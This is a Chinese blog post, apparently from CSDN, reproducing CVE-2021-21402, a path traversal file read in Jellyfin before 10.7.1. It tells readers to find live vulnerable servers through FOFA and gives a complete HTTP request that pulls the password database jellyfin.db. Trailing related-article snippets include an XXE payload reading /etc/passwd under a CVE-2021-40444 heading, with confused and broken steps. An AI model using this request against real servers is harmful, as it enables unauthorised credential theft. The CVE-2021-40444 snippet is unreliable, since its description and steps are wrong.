CVE-2021-21402漏洞复现Jellyfin任意文件读取

最新推荐文章于 2024-04-27 09:41:29 发布
最新推荐文章于 2024-04-27 09:41:29 发布
阅读量2k 收藏
点赞数 1
文章标签: 安全 安全漏洞 数据库 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52834047/article/details/116592800
版权

 1.漏洞描述  

Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。

2.影响版本

Jellyfin<10.7.1

3.复现步骤

1.根据关键词在fofa上搜索包含该漏洞的网站

2.访问网站用burpsuite抓包

3.构造URL请求头  jellyfin.db将从服务器下载带有密码的数据库:

 

POC:GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

完整请求包

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

Host: xx.xx.xx.xx

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

If-Modified-Since: Mon, 31 Aug 2020 11:47:34 GMT

Connection: close

4.安全建议

升级Jellyfin到10.7.1版本

安全by
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2021-21402 Jellyfin任意文件读取漏洞复现
afei001
04-24 1165
目录 1.漏洞概述 2.漏洞成因 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 5.2 CVE-2021-21402_Jellyfin_POC.py 6.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.漏洞概述 jellyfin是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是emby和plex的替代品,它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于Emby3.5.2的下一代,并移植.NET核...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
[ 漏洞复现篇 ]Jellyfin 未授权任意文件读取 CVE-2021-21402
qq_51577576的博客
05-31 2626
🍬博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 🍬博主介绍 一、漏洞简介 二、漏洞编号(选填) 三、漏洞靶场(选填) 四、漏洞影响版本(必填) 五、FOFA Dork/Google Dork(选填) 六、漏洞...
jellyfin任意文件读取漏洞CVE-2021-21402
课嗨教育的专栏
04-22 1504
简介: Jellyfin 是一个免费软件媒体系统。在 10.7.1 版之前的 Jellyfin 中,带有某些终结点的精心设计的请求将允许从 Jellyfin 服务器的文件系统中读取任意文件。当 Windows 用作主机 OS 时,此问题更加普遍。暴露于公共 Internet 的服务器可能会受到威胁。在版本 10.7.1 中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些 访问,但是建议尽快进行更新。 影响版本: Jellyfin<10.7.1 复现..
探索Jellyfin YouTube元数据插件:增强你的媒体中心体验
最新发布
gitblog_00033的博客
04-27 558
探索Jellyfin YouTube元数据插件:增强你的媒体中心体验 项目地址:https://gitcode.com/ankenyr/jellyfin-youtube-metadata-plugin 项目简介 Jellyfin YouTube Metadata Plugin 是一个为Jellyfin媒体服务器设计的扩展插件。它允许用户将YouTube视频集成到Jellyfin中,并自动获取相关...
漏洞复现 Oracle GlassFish Server 任意文件读取漏洞CVE-2017-1000028)
nnn2188185的博客
04-16 1006
Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302
2021-04-29
qq_41503511的博客
04-29 389
漏洞名称: Jellyfin - CVE-2021-21402 任意文件读取漏洞 影响版本: 10.7.0及更早版本 产品介绍: Jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。 漏洞复现: fofa搜索语句:title=“jellyfin漏洞利用 可以读取未经身份验证的任意文件/Audio/{Id}/hls/{segmentId}/stream.mp3 /Audio/{Id}/hls/{segmentId}/stream.aac 不管是.mp3还是.aac都是可以未经授权读取
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21402-Jellyfin:jiaocollCVE-2021-21402-果冻
04-09
CVE-2021-21402-Jellyfin-任意文件读取 此POC仅用于学习交流,由此产生的一切后果本人不承担
CVE-2010-22005漏洞复现
Foreverlove112的博客
09-21 934
CVE-2010-22005漏洞复现
Vmware CVE-2021-21972漏洞复现
New Wh1te Hat
03-16 2355
一、漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 vSphere Client(HTML5) 在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,控制服务器
shiro漏洞复现
weixin_53747497的博客
03-22 1181
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理, 可用于保护任何应用程序的安全。近年来护网中较多的漏洞。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
Sapido路由器命令执行漏洞
chaojixiaojingang
04-19 1314
1.漏洞描述 Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。 2.影响版本 BR270n-v2.1.03 BRC76n-v2.1.03 GR297-v2.1.3 RB1732-v2.0.43 3.网络资产查找 Fofa:app="Sapido-路由器" 4.POC http://xxx.xxx.xxx.xxx/syscmd.asp http://xxx.xxx.xxx.xxx/syscmd.htm 5.漏洞复现 ...
Juniper_RCE漏洞_CVE-2023-36845漏洞复现(附EXP)
m0_64366018的博客
01-15 722
把执行的命令,先base64编码。
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
Zeker62的博客
12-23 4049
漏洞内容 文件读取漏洞概述: 文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。 本漏洞内容: 思科自适应安全设备 Cisco Adaptive Security Appliance (ASA) 软件和思科火力威胁防御 Cisco Firepower Threat Defense (FTD) 软件的 Web 服务界面中存在漏洞,使得未经身份验证的远程攻击者能够执行目录遍历攻击并读取目标系统上的敏感文件。 简而言之,思科代码对恶意URL的注入过滤
Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 765
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值